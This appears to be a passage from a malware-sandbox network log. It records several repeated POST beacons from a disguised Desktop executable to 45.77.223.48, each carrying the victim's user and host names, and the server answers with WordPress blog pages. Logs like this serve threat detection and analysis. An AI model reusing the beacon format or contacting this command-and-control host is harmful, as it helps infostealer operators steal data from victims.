                                              Apr 25, 2024 09:42:38.375683069 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                              Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              32192.168.2.44978145.77.223.48806536C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe
                                              TimestampBytes transferredDirectionData
                                              Apr 25, 2024 09:42:38.643234968 CEST239OUTPOST /~blog/?ajax=ee HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 45.77.223.48
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: FE983A82
                                              Content-Length: 149
                                              Connection: close
                                              Apr 25, 2024 09:42:38.772644997 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                              Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                              Apr 25, 2024 09:42:39.630266905 CEST215INHTTP/1.1 200 OK
                                              Date: Thu, 25 Apr 2024 07:42:38 GMT
                                              Server: Apache
                                              Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Apr 25, 2024 09:42:39.630357027 CEST59INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                              Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                              Apr 25, 2024 09:42:39.630510092 CEST82INData Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                              Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                              Apr 25, 2024 09:42:39.639353037 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                              Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                              Apr 25, 2024 09:42:39.639588118 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                              Data Ascii: <title>Natural biz blog</title>
                                              Apr 25, 2024 09:42:39.639868975 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                              Apr 25, 2024 09:42:39.639964104 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                              Apr 25, 2024 09:42:39.640228987 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                              Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                              Apr 25, 2024 09:42:39.640244007 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                              Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                              Apr 25, 2024 09:42:39.640268087 CEST1289INData Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                              Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              33192.168.2.44978245.77.223.48806536C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe
                                              TimestampBytes transferredDirectionData
                                              Apr 25, 2024 09:42:39.921948910 CEST239OUTPOST /~blog/?ajax=ee HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 45.77.223.48
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: FE983A82
                                              Content-Length: 149
                                              Connection: close
                                              Apr 25, 2024 09:42:40.056274891 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                              Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                              Apr 25, 2024 09:42:40.912035942 CEST215INHTTP/1.1 200 OK
                                              Date: Thu, 25 Apr 2024 07:42:39 GMT
                                              Server: Apache
                                              Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Apr 25, 2024 09:42:40.912065983 CEST70INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09
                                              Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8" />
                                              Apr 25, 2024 09:42:40.912219048 CEST71INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                              Data Ascii: <meta name="viewport" content="width=device-width, initial-scale=1" />
                                              Apr 25, 2024 09:42:40.921699047 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                              Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                              Apr 25, 2024 09:42:40.922399998 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                              Data Ascii: <title>Natural biz blog</title>
                                              Apr 25, 2024 09:42:40.922539949 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                              Apr 25, 2024 09:42:40.922666073 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                              Apr 25, 2024 09:42:40.923187971 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                              Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                              Apr 25, 2024 09:42:40.923249960 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                              Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                              Apr 25, 2024 09:42:40.923321009 CEST1289INData Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                              Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              34192.168.2.44978345.77.223.48806536C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe
                                              TimestampBytes transferredDirectionData
                                              Apr 25, 2024 09:42:41.192421913 CEST239OUTPOST /~blog/?ajax=ee HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 45.77.223.48
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: FE983A82
                                              Content-Length: 149
                                              Connection: close
                                              Apr 25, 2024 09:42:41.322518110 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                              Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                              Apr 25, 2024 09:42:42.184628010 CEST215INHTTP/1.1 200 OK
                                              Date: Thu, 25 Apr 2024 07:42:41 GMT
                                              Server: Apache
                                              Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Apr 25, 2024 09:42:42.184706926 CEST141INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22
                                              Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                              Apr 25, 2024 09:42:42.194593906 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                              Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                              Apr 25, 2024 09:42:42.195008039 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                              Data Ascii: <title>Natural biz blog</title>
                                              Apr 25, 2024 09:42:42.195261955 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                              Apr 25, 2024 09:42:42.195393085 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                              Apr 25, 2024 09:42:42.195482969 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                              Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                              Apr 25, 2024 09:42:42.195574045 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                              Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                              Apr 25, 2024 09:42:42.195687056 CEST1289INData Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                              Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo
                                              Apr 25, 2024 09:42:42.195718050 CEST1289INData Raw: 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2e 35 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 2e 68 61 73 2d 73 6d 61 6c 6c 2d 69 63 6f 6e 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 7d 2e 77 70 2d 62 6c
                                              Data Ascii: margin-right:.5em}.wp-block-social-links.has-small-icon-size{font-size:16px}.wp-block-social-links,.wp-block-social-links.has-normal-icon-size{font-size:24px}.wp-block-social-links.has-large-icon-size{font-size:36px}.wp-block-social-links.has-


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              35192.168.2.44978445.77.223.48806536C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe
                                              TimestampBytes transferredDirectionData
                                              Apr 25, 2024 09:42:42.452934980 CEST239OUTPOST /~blog/?ajax=ee HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 45.77.223.48
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: FE983A82
                                              Content-Length: 149
                                              Connection: close
                                              Apr 25, 2024 09:42:42.580739021 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                              Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                              Apr 25, 2024 09:42:43.494532108 CEST215INHTTP/1.1 200 OK
                                              Date: Thu, 25 Apr 2024 07:42:42 GMT
                                              Server: Apache
                                              Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Apr 25, 2024 09:42:43.494645119 CEST59INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22
                                              Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
                                              Apr 25, 2024 09:42:43.494771004 CEST82INData Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a
                                              Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                              Apr 25, 2024 09:42:43.513849974 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                              Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                              Apr 25, 2024 09:42:43.514064074 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                              Data Ascii: <title>Natural biz blog</title>
                                              Apr 25, 2024 09:42:43.514203072 CEST134INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
                                              Apr 25, 2024 09:42:43.514353991 CEST152INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43
                                              Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog &raquo; Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
                                              Apr 25, 2024 09:42:43.514488935 CEST1289INData Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d
                                              Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
                                              Apr 25, 2024 09:42:43.514532089 CEST1289INData Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72
                                              Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
                                              Apr 25, 2024 09:42:43.514616966 CEST1289INData Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74
                                              Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              36192.168.2.44978545.77.223.48806536C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe
                                              TimestampBytes transferredDirectionData
                                              Apr 25, 2024 09:42:43.818012953 CEST239OUTPOST /~blog/?ajax=ee HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: 45.77.223.48
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: FE983A82
                                              Content-Length: 149
                                              Connection: close
                                              Apr 25, 2024 09:42:43.943766117 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                              Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
                                              Apr 25, 2024 09:42:44.759720087 CEST215INHTTP/1.1 200 OK
                                              Date: Thu, 25 Apr 2024 07:42:43 GMT
                                              Server: Apache
                                              Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/"
                                              Connection: close
                                              Content-Type: text/html; charset=UTF-8
                                              Apr 25, 2024 09:42:44.760068893 CEST141INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22
                                              Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
                                              Apr 25, 2024 09:42:44.768596888 CEST57INData Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a
                                              Data Ascii: <meta name='robots' content='max-image-preview:large' />
                                              Apr 25, 2024 09:42:44.769366980 CEST32INData Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a
                                              Data Ascii: <title>Natural biz blog</title>
